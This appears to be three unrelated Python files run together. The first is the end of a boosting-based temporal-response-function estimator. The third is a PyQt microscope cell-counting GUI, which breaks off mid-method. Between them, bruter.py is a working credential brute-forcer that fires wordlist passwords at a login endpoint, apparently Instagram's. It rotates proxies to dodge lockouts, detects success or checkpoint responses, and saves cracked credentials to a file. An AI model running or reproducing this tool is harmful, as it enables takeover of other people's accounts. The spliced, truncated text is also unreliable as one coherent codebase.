'h': self._h, 'r': self.r, 'r_l1': self.r_l1, 'isnan': self._isnan,
'spearmanr': self.spearmanr, 'residual': self.residual,
't_run': self.t_run, 'version': VERSION,
'y_mean': self.y_mean, 'y_scale': self.y_scale,
'x_mean': self.x_mean, 'x_scale': self.x_scale,
'y_info': self._y_info,
**self._debug_attrs,
}
def __setstate__(self, state):
if state['version'] < 7:
state.update(partitions=None, partitions_arg=None, model=None, basis=0, basis_window='hamming')
elif state['version'] < 8:
state['partitions'] = state.pop('n_partitions')
state['partitions_arg'] = state.pop('n_partitions_arg')
if state['version'] < 9:
state['residual'] = state.pop('fit_error')
self.__init__(**state)
def __repr__(self):
if self.x is None or isinstance(self.x, str):
x = self.x
else:
x = ' + '.join(map(str, self.x))
items = [
'boosting %s ~ %s' % (self.y, x),
'%g - %g' % (self.tstart, self.tstop),
]
for name, param in inspect.signature(boosting).parameters.items():
if param.default is inspect.Signature.empty or name == 'ds':
continue
elif name == 'debug':
continue
elif name == 'partitions':
value = self._partitions_arg
else:
value = getattr(self, name)
if value != param.default:
items.append(f'{name}={value}')
return f"<{', '.join(items)}>"
@LazyProperty
def h(self):
if not self.basis:
return self._h
elif isinstance(self._h, tuple):
return tuple(h.smooth('time', self.basis, self.basis_window, 'full') for h in self._h)
else:
return self._h.smooth('time', self.basis, self.basis_window, 'full')
@LazyProperty
def h_scaled(self):
if self.y_scale is None:
return self.h
elif isinstance(self.h, NDVar):
out = self.h * (self.y_scale / self.x_scale)
out.info = self._y_info.copy()
return out
else:
out = []
for h, sx in zip(self.h, self.x_scale):
h = h * (self.y_scale / sx)
h.info = self._y_info.copy()
out.append(h)
return tuple(out)
@LazyProperty
def h_source(self):
if self.basis:
return self._h
else:
return None
@LazyProperty
def h_time(self):
if isinstance(self.h, NDVar):
return self.h.time
else:
return self.h[0].time
def _set_parc(self, parc):
"""Change the parcellation of source-space result
Notes
-----
No warning for missing sources!
"""
from .._ndvar import set_parc
if not self.r.has_dim('source'):
raise RuntimeError('BoostingResult does not have source-space data')
def sub_func(obj):
if obj is None:
return None
elif isinstance(obj, tuple):
return tuple(sub_func(obj_) for obj_ in obj)
obj_new = set_parc(obj, parc)
index = np.invert(obj_new.source.parc.startswith('unknown-'))
return obj_new.sub(source=index)
for attr in ('h', 'r', 'spearmanr', 'residual', 'y_mean', 'y_scale'):
setattr(self, attr, sub_func(getattr(self, attr)))
@user_activity
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
error='l2', basis=0, basis_window='hamming',
partitions=None, model=None, ds=None, selective_stopping=0,
debug=False):
"""Estimate a filter with boosting
Parameters
----------
y : NDVar
Signal to predict.
x : NDVar | sequence of NDVar
Signal to use to predict ``y``. Can be sequence of NDVars to include
multiple predictors. Time dimension must correspond to ``y``.
tstart : float
Start of the TRF in seconds.
tstop : float
Stop of the TRF in seconds.
scale_data : bool | 'inplace'
Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
the standard deviation (when ``error='l2'``) or the mean absolute
value (when ``error='l1'``). With ``scale_data=True`` (default) the
original ``y`` and ``x`` are left untouched; use ``'inplace'`` to save
memory by scaling the original ``y`` and ``x``.
delta : scalar
Step for changes in the kernel.
mindelta : scalar
If the error for the training data can't be reduced, divide ``delta``
in half until ``delta < mindelta``. The default is ``mindelta = delta``,
i.e. ``delta`` is constant.
error : 'l2' | 'l1'
Error function to use (default is ``l2``).
basis : float
Use a basis of windows with this length for the kernel (by default,
impulses are used).
basis_window : str | float | tuple
Basis window (see :func:`scipy.signal.get_window` for options; default
is ``'hamming'``).
partitions : int
Divide the data into this many ``partitions`` for cross-validation-based
early stopping. In each partition, ``n - 1`` segments are used for
training, and the remaining segment is used for validation.
If data is continuous, data are divided into contiguous segments of
equal length (default 10).
If data has cases, cases are divided with ``[::partitions]`` slices
(default ``min(n_cases, 10)``; if ``model`` is specified, ``n_cases``
is the lowest number of cases in any cell of the model).
model : Categorial
If data has cases, divide cases into different categories (division
for crossvalidation is done separately for each cell).
ds : Dataset
If provided, other parameters can be specified as string for items in
``ds``.
selective_stopping : int
By default, the boosting algorithm stops when the testing error stops
decreasing. With ``selective_stopping=True``, boosting continues but
excludes the predictor (one time-series in ``x``) that caused the
increase in testing error, and continues until all predictors are
stopped. The integer value of ``selective_stopping`` determines after
how many steps with error increases each predictor is excluded.
debug : bool
Store additional properties in the result object (increases memory
consumption).
Returns
-------
result : BoostingResult
Object containing results from the boosting estimation (see
:class:`BoostingResult`).
Notes
-----
In order to predict data, use the :func:`convolve` function::
>>> ds = datasets.get_uts()
>>> ds['a1'] = epoch_impulse_predictor('uts', 'A=="a1"', ds=ds)
>>> ds['a0'] = epoch_impulse_predictor('uts', 'A=="a0"', ds=ds)
>>> res = boosting('uts', ['a0', 'a1'], 0, 0.5, partitions=10, model='A', ds=ds)
>>> y_pred = convolve(res.h_scaled, ['a0', 'a1'], ds=ds)
The boosting algorithm is described in [1]_.
References
----------
.. [1] David, S. V., Mesgarani, N., & Shamma, S. A. (2007). Estimating
sparse spectro-temporal receptive fields with natural stimuli. Network:
Computation in Neural Systems, 18(3), 191-212.
`10.1080/09548980701609235 <https://doi.org/10.1080/09548980701609235>`_.
"""
# check arguments
mindelta_ = delta if mindelta is None else mindelta
selective_stopping = int(selective_stopping)
if selective_stopping < 0:
raise ValueError(f"selective_stopping={selective_stopping}")
data = RevCorrData(y, x, error, scale_data, ds)
data.initialize_cross_validation(partitions, model, ds)
n_y = len(data.y)
n_x = len(data.x)
# TRF extent in indices
tstep = data.time.tstep
i_start = int(round(tstart / tstep))
i_stop = int(round(tstop / tstep))
trf_length = i_stop - i_start
if data.segments is None:
i_skip = trf_length - 1
else:
i_skip = 0
if basis:
n = int(round(basis / data.time.tstep))
w = scipy.signal.get_window(basis_window, n, False)
w /= w.sum()
for xi in data.x:
xi[:] = scipy.signal.convolve(xi, w, 'same')
# progress bar
n_cv = len(data.cv_segments)
pbar = tqdm(desc=f"Boosting{f' {n_y} signals' if n_y > 1 else ''}", total=n_y * n_cv, disable=CONFIG['tqdm'])
t_start = time.time()
# result containers
res = np.empty((3, n_y)) # r, rank-r, error
h_x = np.empty((n_y, n_x, trf_length))
store_y_pred = bool(data.vector_dim) or debug
y_pred = np.empty_like(data.y) if store_y_pred else np.empty(data.y.shape[1:])
# boosting
if CONFIG['n_workers']:
# Make sure cross-validations are added in the same order, otherwise
# slight numerical differences can occur
job_queue, result_queue = setup_workers(data, i_start, trf_length, delta, mindelta_, error, selective_stopping)
stop_jobs = Event()
thread = Thread(target=put_jobs, args=(job_queue, n_y, n_cv, stop_jobs))
thread.start()
# collect results
try:
h_segs = {}
for _ in range(n_y * n_cv):
y_i, seg_i, h = result_queue.get()
pbar.update()
if y_i in h_segs:
h_seg = h_segs[y_i]
h_seg[seg_i] = h
if len(h_seg) == n_cv:
del h_segs[y_i]
hs = [h for h in (h_seg[i] for i in range(n_cv)) if h is not None]
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
else:
h_segs[y_i] = {seg_i: h}
except KeyboardInterrupt:
stop_jobs.set()
raise
else:
for y_i, y_ in enumerate(data.y):
hs = []
for segments, train, test in data.cv_segments:
h = boost(y_, data.x, data.x_pads, segments, train, test, i_start, trf_length, delta, mindelta_, error, selective_stopping)
if h is not None:
hs.append(h)
pbar.update()
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
pbar.close()
t_run = time.time() - t_start
# fit-evaluation statistics
if data.vector_dim:
y_vector = data.y.reshape(data.vector_shape)
y_pred_vector = y_pred.reshape(data.vector_shape)
# error: distance between actual and modeled
y_pred_error = norm(y_vector - y_pred_vector, axis=1)
if error == 'l1':
errs = y_pred_error.mean(-1)
elif error == 'l2':
errs = y_pred_error.std(-1)
else:
raise RuntimeError(f"error={error!r}")
rs, rs_l1 = data.vector_correlation(y_vector, y_pred_vector)
if rs_l1 is None:
r_l1 = None
else:
r_l1 = data.package_value(rs_l1, 'l1 correlation', meas='r')
spearmanr = None
else:
rs, rrs, errs = res
r_l1 = None
spearmanr = data.package_value(rrs, 'rank correlation', meas='r')
isnan = np.isnan(rs)
rs[isnan] = 0
r = data.package_value(rs, 'correlation', meas='r')
residual = data.package_value(errs, 'fit error')
y_mean, y_scale, x_mean, x_scale = data.data_scale_ndvars()
if debug:
debug_attrs = {
'y_pred': data.package_y_like(y_pred, 'y-pred'),
}
else:
debug_attrs = {}
h = data.package_kernel(h_x, tstart)
model_repr = None if model is None else data.model
return BoostingResult(
# input parameters
data.y_name, data.x_name, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions, data.partitions, model_repr,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, data.y_info,
# vector results
r_l1, selective_stopping,
**debug_attrs)
class BoostingStep:
__slots__ = ('i_stim', 'i_time', 'delta', 'e_train', 'e_test')
def __init__(self, i_stim, i_time, delta_signed, e_test, e_train):
self.i_stim = i_stim
self.i_time = i_time
self.delta = delta_signed
self.e_train = e_train
self.e_test = e_test
def boost(y, x, x_pads, all_index, train_index, test_index, i_start, trf_length,
delta, mindelta, error, selective_stopping=0, return_history=False):
"""Estimate one filter with boosting
Parameters
----------
y : array (n_times,)
Dependent signal, time series to predict.
x : array (n_stims, n_times)
Stimulus.
x_pads : array (n_stims,)
Padding for x.
train_index : array of (start, stop)
Time sample index of training segments.
test_index : array of (start, stop)
Time sample index of test segments.
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : str
Error function to use.
selective_stopping : int
Selective stopping.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
SSE for test data at each iteration.
"""
delta_error_func = DELTA_ERROR_FUNC[error]
error = ERROR_FUNC[error]
n_stims, n_times = x.shape
assert y.shape == (n_times,)
h = np.zeros((n_stims, trf_length))
# buffers
y_error = y.copy()
new_error = np.empty(h.shape)
new_sign = np.empty(h.shape, np.int8)
x_active = np.ones(n_stims, dtype=np.int8)
# history
best_test_error = np.inf
history = []
i_stim = i_time = delta_signed = None
best_iteration = 0
# pre-assign iterators
for i_boost in range(999999):
# evaluate current h
e_test = error(y_error, test_index)
e_train = error(y_error, train_index)
step = BoostingStep(i_stim, i_time, delta_signed, e_test, e_train)
history.append(step)
# evaluate stopping conditions
if e_test < best_test_error:
best_test_error = e_test
best_iteration = i_boost
elif i_boost >= 2 and e_test > history[-2].e_test:
if selective_stopping:
if selective_stopping > 1:
n_bad = selective_stopping - 1
# only stop if the predictor overfits twice without intermittent improvement
undo = 0
for i in range(-2, -len(history), -1):
step = history[i]
if step.e_test > e_test:
break # the error improved
elif step.i_stim == i_stim:
if step.e_test > history[i - 1].e_test:
# the same stimulus caused an error increase
if n_bad == 1:
undo = i
break
n_bad -= 1
else:
break
else:
undo = -1
if undo:
# revert changes
for i in range(-undo):
step = history.pop(-1)
h[step.i_stim, step.i_time] -= step.delta
update_error(y_error, x[step.i_stim], x_pads[step.i_stim], all_index, -step.delta, step.i_time + i_start)
step = history[-1]
# disable predictor
x_active[i_stim] = False
if not np.any(x_active):
break
new_error[i_stim, :] = np.inf
# Basic
# -----
# stop the iteration if all the following requirements are met
# 1. more than 10 iterations are done
# 2. The testing error in the latest iteration is higher than that in
# the previous two iterations
elif i_boost > 10 and e_test > history[-3].e_test:
# print("error(test) not improving in 2 steps")
break
# generate possible movements -> training error
generate_options(y_error, x, x_pads, x_active, train_index, i_start, delta_error_func, delta, new_error, new_sign)
i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
new_train_error = new_error[i_stim, i_time]
delta_signed = new_sign[i_stim, i_time] * delta
# If no improvements can be found reduce delta
if new_train_error > step.e_train:
delta *= 0.5
if delta >= mindelta:
i_stim = i_time = delta_signed = None
# print("new delta: %s" % delta)
continue
else:
# print("No improvement possible for training data")
break
# abort if we're moving in circles
if step.delta and i_stim == step.i_stim and i_time == step.i_time and delta_signed == -step.delta:
break
# update h with best movement
h[i_stim, i_time] += delta_signed
update_error(y_error, x[i_stim], x_pads[i_stim], all_index, delta_signed, i_time + i_start)
else:
raise RuntimeError("Maximum number of iterations exceeded")
# print(' (%i iterations)' % (i_boost + 1))
# reverse changes after best iteration
if best_iteration:
for step in history[-1: best_iteration: -1]:
if step.delta:
h[step.i_stim, step.i_time] -= step.delta
else:
h = None
if return_history:
return h, [step.e_test for step in history]
else:
return h
def setup_workers(data, i_start, trf_length, delta, mindelta, error, selective_stopping):
n_y, n_times = data.y.shape
n_x, _ = data.x.shape
y_buffer = RawArray('d', n_y * n_times)
y_buffer[:] = data.y.ravel()
x_buffer = RawArray('d', n_x * n_times)
x_buffer[:] = data.x.ravel()
x_pads_buffer = RawArray('d', n_x)
x_pads_buffer[:] = data.x_pads
job_queue = Queue(200)
result_queue = Queue(200)
args = (y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, data.cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue)
for _ in range(CONFIG['n_workers']):
process = Process(target=boosting_worker, args=args)
process.start()
return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
x_pads = np.frombuffer(x_pads_buffer, np.float64, n_x)
while True:
y_i, seg_i = job_queue.get()
if y_i == JOB_TERMINATE:
return
all_index, train_index, test_index = cv_segments[seg_i]
h = boost(y[y_i], x, x_pads, all_index, train_index, test_index, i_start, trf_length, delta, mindelta, error, selective_stopping)
result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs, stop):
"Feed boosting jobs into a Queue"
for job in product(range(n_y), range(n_segs)):
queue.put(job)
if stop.isSet():
while not queue.empty():
queue.get()
break
for _ in range(CONFIG['n_workers']):
queue.put((JOB_TERMINATE, None))
def convolve(h, x, x_pads, h_i_start, segments=None, out=None):
"""h * x with time axis matching x
Parameters
----------
h : array, (n_stims, h_n_samples)
H.
x : array, (n_stims, n_samples)
X.
x_pads : array (n_stims,)
Padding for x.
h_i_start : int
Time shift of the first sample of ``h``.
segments : array (n_segments, 2)
Data segments.
out : array
Buffer for predicted ``y``.
"""
n_x, n_times = x.shape
h_n_times = h.shape[1]
if out is None:
out = np.zeros(n_times)
else:
out.fill(0)
if segments is None:
segments = ((0, n_times),)
# determine valid section of convolution (cf. _ndvar.convolve())
h_i_max = h_i_start + h_n_times - 1
out_start = max(0, h_i_start)
out_stop = min(0, h_i_max)
conv_start = max(0, -h_i_start)
conv_stop = -h_i_start
# padding
h_pad = np.sum(h * x_pads[:, newaxis], 0)
# padding for pre-
pad_head_n_times = max(0, h_n_times + h_i_start)
if pad_head_n_times:
pad_head = np.zeros(pad_head_n_times)
for i in range(min(pad_head_n_times, h_n_times)):
pad_head[:pad_head_n_times - i] += h_pad[- i - 1]
else:
pad_head = None
# padding for post-
pad_tail_n_times = -min(0, h_i_start)
if pad_tail_n_times:
pad_tail = np.zeros(pad_tail_n_times)
for i in range(pad_tail_n_times):
pad_tail[i:] += h_pad[i]
else:
pad_tail = None
for start, stop in segments:
if pad_head is not None:
out[start: start + pad_head_n_times] += pad_head
if pad_tail is not None:
out[stop - pad_tail_n_times: stop] += pad_tail
out_index = slice(start + out_start, stop + out_stop)
y_index = slice(conv_start, stop - start + conv_stop)
for ind in range(n_x):
out[out_index] += scipy.signal.convolve(h[ind], x[ind, start:stop])[y_index]
return out
def evaluate_kernel(y, y_pred, error, i_skip, segments=None):
"""Fit quality statistics
Parameters
----------
y : array, (n_samples)
Y.
y_pred : array, (n_samples)
Predicted Y.
error : str
Error metric.
i_skip : int
Skip this many samples for evaluating model fit.
segments : array (n_segments, 2)
Data segments.
Returns
-------
r : float | array
Pearson correlation.
rank_r : float | array
Spearman rank correlation.
error : float | array
Error corresponding to error_func.
"""
# discard onset
if i_skip:
assert segments is None, "Not implemented"
y = y[i_skip:]
y_pred = y_pred[i_skip:]
error_func = ERROR_FUNC[error]
index = np.array(((0, len(y)),), np.int64)
return (np.corrcoef(y, y_pred)[0, 1],
spearmanr(y, y_pred)[0],
error_func(y - y_pred, index))
|
bruter.py
|
# Date: 05/05/2018
# Author: Pure-L0G1C
# Description: Bruter
from .spyder import Spyder
from .scraper import Queue
from .session import Session
from time import time, sleep
from threading import Thread, Lock
from os import system, remove, path
from platform import system as platform
from .const import max_fails, fetch_time, site_details, max_proxy_usage, credentials
class Bruter(object):
def __init__(self, username, threads, wordlist):
self.max_threads = threads if all([threads <= 16, threads > 0]) else 16 # 16 is the absolute maximum
self.cls = 'cls' if platform() == 'Windows' else 'clear'
self.session = Session(username, wordlist)
self.proxy_usage_count = 0
self.wordlist = wordlist
self.username = username
self.user_abort = False
self.passlist = Queue()
self.spyder = Spyder()
self.retrieve = False
self.isFound = False
self.isAlive = True
self.lock = Lock()
self.read = False
self.attempts = 0
self.threads = 0
self.pwd = None
self.ip = None
self.fails = 0
# reduce flickering display on Windows
self.last_attempt = None
self.last_proxy = None
self.last_ip = None
def login(self, pwd):
try:
if not self.spyder.proxies.qsize:
return
with self.lock:
self.pwd = pwd
self.threads += 1
self.proxy_usage_count += 1
br = self.spyder.br
home_url = site_details['home_url']
login_url = site_details['login_url']
username_field = site_details['username_field']
password_field = site_details['password_field']
data = { username_field: self.username, password_field: pwd }
br.headers.update({'X-CSRFToken': br.get(home_url).cookies.get_dict()['csrftoken']})
# login
response = br.post(login_url, data=data, timeout=fetch_time).json()
# validate
if 'authenticated' in response:
if response['authenticated']:
self.pwd_found(pwd)
elif 'message' in response:
if response['message'] == 'checkpoint_required':
self.pwd_found(pwd)
elif response['status'] == 'fail': # account got locked
if self.threads > 0:
with self.lock:self.threads -= 1
return
else:pass
else:pass
with self.lock:
if all([not self.isFound, self.isAlive, pwd in self.passlist.queue]):
self.passlist.queue.pop(self.passlist.queue.index(pwd))
self.attempts += 1
except KeyboardInterrupt:
self.user_abort = True
self.stop()
except:
with self.lock:self.fails += 1
finally:
if self.threads > 0:
with self.lock:self.threads -= 1
def pwd_found(self, pwd):
if self.isFound:return
self.isFound = True
del self.passlist.queue[:]
self.display(pwd, True)
def kill(self):
self.isAlive = False
self.spyder.isAlive = False
def display(self, pwd, isFound=False, n=1):
if not isFound:system(self.cls)
else:
with open(credentials, 'a') as f:
f.write('Username: {}\nPassword: {}\n\n'.format(self.username, pwd))
pwd = pwd if pwd else ''
ip = '{}[{}]'.format(self.ip, self.spyder.proxy_info['country']) if all([self.ip, self.spyder.proxy_info]) else ''
try:
if not isFound:
print('[-] Proxy-IP: {}\n[-] Wordlist: {}\n[-] Username: {}\n[-] Password: {}\n[-] Attempts: {}\n[-] Proxies: {}'.
format(ip, self.wordlist, self.username, ', '.join(self.passlist.queue) if not self.isFound else pwd, self.attempts, self.spyder.proxies.qsize))
if not n:self.display(pwd, isFound=True)
else:
if n:self.display(pwd, n-1)
print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format(self.username, pwd))
except:pass
def attack(self):
while all([not self.isFound, self.isAlive]):
try:
if any([not self.ip, self.proxy_usage_count >= max_proxy_usage, self.fails >= max_fails]):
try:
if not self.spyder.proxies.qsize:continue
self.spyder.renew_proxy()
ip = self.spyder.ip_addr()
if not ip:continue
self.proxy_usage_count = 0
self.fails = 0
self.ip = ip
except KeyboardInterrupt:
self.user_abort = True
self.stop()
# try all the passwords in the queue
for pwd in self.passlist.queue:
if self.threads >= self.max_threads:break
if any([not self.isAlive, self.isFound]):break
if self.proxy_usage_count >= max_proxy_usage:break
# login thread
login = Thread(target=self.login, args=[pwd])
login.daemon = True
login.start()
# wait time
started = time()
# wait for threads
while all([not self.isFound, self.isAlive, self.threads>0, self.passlist.qsize]):
try:
# bypass slow, authentication required, and hanging proxies
if int(time() - started) >= 5:
self.fails = max_fails
self.threads = 0
except:pass
else:
self.threads = 0
if all([self.isAlive, not self.isFound]):
self.session.write(self.attempts, self.passlist.queue)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
except:pass
def pwd_manager(self):
with open(self.wordlist, 'r') as wordlist:
attempts = 0
for pwd in wordlist:
if any([not self.isAlive, self.isFound]):break
if self.retrieve:
if attempts < (self.attempts + self.passlist.qsize)-1:
attempts += 1
continue
else:self.retrieve = False
if self.passlist.qsize <= self.max_threads:
self.passlist.put(pwd.replace('\n', '').replace('\r', '').replace('\t', ''))
else:
while all([self.passlist.qsize, not self.isFound, self.isAlive]):pass
if all([not self.passlist.qsize, not self.isFound, self.isAlive]):
self.passlist.put(pwd.replace('\n', '').replace('\r', '').replace('\t', ''))
# done reading wordlist
self.read = True if all([not self.user_abort, self.isAlive]) else False
while all([not self.isFound, self.isAlive, self.passlist.qsize]):
try:sleep(1.5)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
if self.isAlive:self.stop()
def stop(self):
if any([self.read, self.isFound]):self.session.delete()
else:self.session.write(self.attempts, self.passlist.queue)
self.kill()
def primary_threads(self):
proxy_manager = Thread(target=self.spyder.proxy_manager)
proxy_manager.daemon = True
proxy_manager.start()
pwd_manager = Thread(target=self.pwd_manager)
pwd_manager.daemon = True
pwd_manager.start()
attack = Thread(target=self.attack)
attack.daemon = True
attack.start()
def start(self):
self.primary_threads()
while all([not self.isFound, self.isAlive]):
try:
if self.isAlive:
if self.ip:
if any([self.last_attempt != self.attempts, self.last_proxy != self.spyder.proxies.qsize, self.last_ip != self.ip]):
self.display(self.pwd)
self.last_proxy = self.spyder.proxies.qsize
self.last_attempt = self.attempts
self.last_ip = self.ip
else:self.display(self.pwd)
if not self.spyder.proxy_info:
print('\n[+] Searching for proxies ...')
sleep(1.5 if not self.spyder.proxy_info else 0.5)
except KeyboardInterrupt:
self.user_abort = True
self.stop()
|
mainWindow.py
|
import os
import queue as Queue
import threading
from datetime import datetime
import numpy as np
import cv2
from PyQt5.QtCore import Qt
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QShortcut, QStackedWidget, QMessageBox, QWidget, QVBoxLayout, QHBoxLayout, QPushButton
from PyQt5.QtGui import QKeySequence
from logger import logger
from count import getCells
import util
from gui.imageWidget import ImageWidget
from gui.settingsWidget import SettingsWidget
from hardwareHandler import HardwareHandler
class MainWindow(QMainWindow):
errorSignal = pyqtSignal(str) #emitted when errors occur. error box with message msg is opened by main thread
countingDoneSignal = pyqtSignal()
triggeringDoneSignal = pyqtSignal()
backToPreviewSignal = pyqtSignal()
def __init__(self):
super(MainWindow, self).__init__()
self.errorSignal .connect(self.openErrorMessage)
self.countingDoneSignal .connect(self.countingDone)
self.triggeringDoneSignal.connect(self.triggeringDone)
self.backToPreviewSignal .connect(self.backToPreview)
self.cellsQueue = Queue.Queue() # queue to pass cell coordinates found by counting algorithm
self.imageQueue = Queue.Queue() # Queue to hold images
self.mode = None # "Color" or "UV"
util.loadSettings()
self.hardwareHandler = HardwareHandler(self.imageQueue)
##### shortcuts ####
self.quitSC = QShortcut(QKeySequence('Ctrl+Q'), self)
self.quitSC.activated.connect(QApplication.instance().quit)
self.exitFS = QShortcut("ESC", self)
self.exitFS.activated.connect(self.showMaximized)
def switchMaxFS():
if self.isFullScreen():
self.showNormal() #workaround... if showNormal is not called in between, showMaxize does not work...
self.showMaximized()
else: self.showFullScreen()
self.switchMaxFS = QShortcut(QKeySequence('Ctrl+F'), self)
self.switchMaxFS.activated.connect(switchMaxFS)
############# layout #############
self.centralWidget = QWidget(self)
self.hlayout = QHBoxLayout()
##### image view #####
self.imageWidget = ImageWidget(self.imageQueue, self)
self.hlayout.addWidget(self.imageWidget)
##### control widget #####
self.controlWidget = QStackedWidget()
self.controlWidget.setMaximumWidth(320)
## page 1 - main page##
self.page1Widget = QWidget(self.controlWidget)
self.page1Layout = QVBoxLayout()
self.page1Widget.setLayout(self.page1Layout)
buttonTrigger = QPushButton("&Trigger")
buttonSettings = QPushButton("&Settings")
buttonTriggerAndSave = QPushButton("Trigger + Save")
self.buttonMode = QPushButton("Switch to ...")
buttonTrigger .clicked.connect(self.trigger)
buttonSettings .clicked.connect(lambda: self.controlWidget.setCurrentIndex(2))
buttonSettings .clicked.connect(lambda: self.infoTextBox.setText(""))
buttonTriggerAndSave.clicked.connect(self.triggerAndSave)
self.buttonMode .clicked.connect(lambda: self.changeMode())
self.page1Layout.addWidget(buttonTrigger)
self.page1Layout.addWidget(self.buttonMode)
self.page1Layout.addWidget(buttonSettings)
self.page1Layout.addWidget(buttonTriggerAndSave)
## page 2 - image captured##
self.page2Widget = QWidget(self.controlWidget)
self.page2Layout = QVBoxLayout()
self.page2Widget.setLayout(self.page2Layout)
buttonBackToPreview = QPushButton("&Back")
buttonSaveImage = QPushButton("&Save")
buttonCount = QPushButton("&Count")
buttonBackToPreview.clicked.connect(self.backToPreview)
buttonSaveImage .clicked.connect(lambda: self.saveImage())
buttonCount .clicked.connect(self.startCounting)
self.page2Layout.addWidget(buttonBackToPreview)
self.page2Layout.addWidget(buttonSaveImage)
self.page2Layout.addWidget(buttonCount)
## page 3 - settings ##
self.settingsWidget = SettingsWidget(self.controlWidget)
self.settingsWidget.OKButton.clicked.connect(lambda: self.controlWidget.setCurrentIndex(0))
self.settingsWidget.OKButton.clicked.connect(lambda: self.infoTextBox.setText("Live capturing"))
# signals emitted when settings change
self.settingsWidget.UVLEDSettingsUpdatedSignal .connect(self.hardwareHandler.updateLEDUV)
self.settingsWidget.ColorLEDSettingsUpdatedSignal .connect(self.hardwareHandler.updateLEDColors)
self.settingsWidget.captureSettingsUpdatedSignal .connect(lambda : self.hardwareHandler.updateCaptureSettings(mode = self.mode))
self.settingsWidget.resetSignal .connect(self.hardwareHandler.updateLEDUV)
self.settingsWidget.resetSignal .connect(self.hardwareHandler.updateLEDColors)
self.settingsWidget.resetSignal .connect(lambda : self.hardwareHandler.updateCaptureSettings(mode = self.mode))
#set mode if tab is changed in settings widget
def setModeFromTabIndex(tabIndex: int):
if tabIndex == 0: self.changeMode("Color")
elif tabIndex == 1: self.changeMode("UV")
self.settingsWidget.tabs.currentChanged.connect(setModeFromTabIndex)
## page 4 - counting ##
self.page4Widget = QWidget(self.controlWidget)
self.page4Layout = QVBoxLayout(self.page4Widget)
# buttonStopCounting = QPushButton("&Stop Counting")
# buttonStopCounting.clicked.connect(self.stopCounting)
# self.page4Layout.addWidget(buttonStopCounting)
countingLabel = QLabel("Counting..", alignment = Qt.AlignCenter)
self.page4Layout.addWidget(countingLabel)
## page 5 - trigger and save ##
self.page5Widget = QWidget(self.controlWidget)
self.page5Layout = QVBoxLayout(self.page5Widget)
self.triggerAndSaveLabel = QLabel("Capture color Image\t\n"
"Save color Image\t\t\n"
"Capture UV Image\t\n"
"Save UV Image\t\t", alignment = Qt.AlignVCenter | Qt.AlignLeft)
self.page5Layout.addWidget(self.triggerAndSaveLabel)
self.controlWidget.addWidget(self.page1Widget)
self.controlWidget.addWidget(self.page2Widget)
self.controlWidget.addWidget(self.settingsWidget)
self.controlWidget.addWidget(self.page4Widget)
self.controlWidget.addWidget(self.page5Widget)
self.hlayout.addWidget(self.controlWidget)
self.hlayout.setContentsMargins(0,0,0,0)
self.centralWidget.setLayout(self.hlayout)
self.setCentralWidget(self.centralWidget)
## info in right bottom corner
self.infoTextBox = QLabel(self.centralWidget)
self.infoTextBox.setText("TEST")
self.infoTextBox.setAlignment(Qt.AlignRight | Qt.AlignBottom)
self.infoTextBox.setAttribute(Qt.WidgetAttribute.WA_TransparentForMouseEvents) # pylint: disable=no-member
self.installEventFilter( util.ObjectResizer(self, self.infoTextBox))
logger.info("Gui started")
# start capture and led
self.changeMode("Color")
self.imageWidget.startShowLive()
self.infoTextBox.setText("Live capturing")
# def stopCapturing(self):
# self.imageWidget.stopShowLive()
# self.hardwareHandler.stopCapturing()
# self.capture_thread.join()
# self.imageQueue.queue.clear()
def changeMode(self, mode = None):
if mode is None:
if self.mode == "UV" : mode = "Color"
elif self.mode == "Color": mode = "UV"
if mode != self.mode:
logger.info(f"Changing mode to '{mode}'.")
self.mode = mode
if self.mode == "UV":
#update button text
self.buttonMode.setText("Switch to Color")
#update settings tab. block signals to acoid infinite cyclic signal calls
self.settingsWidget.tabs.blockSignals(True)
self.settingsWidget.tabs.setCurrentIndex(1)
self.settingsWidget.tabs.blockSignals(False)
#set leds
self.hardwareHandler.switchCOLOR_LED(False)
self.hardwareHandler.switchUV_LED (True)
elif self.mode == "Color":
#update button text
self.buttonMode.setText("Switch to UV")
#update settings tab. block signals to acoid infinite cyclic signal calls
self.settingsWidget.tabs.blockSignals(True)
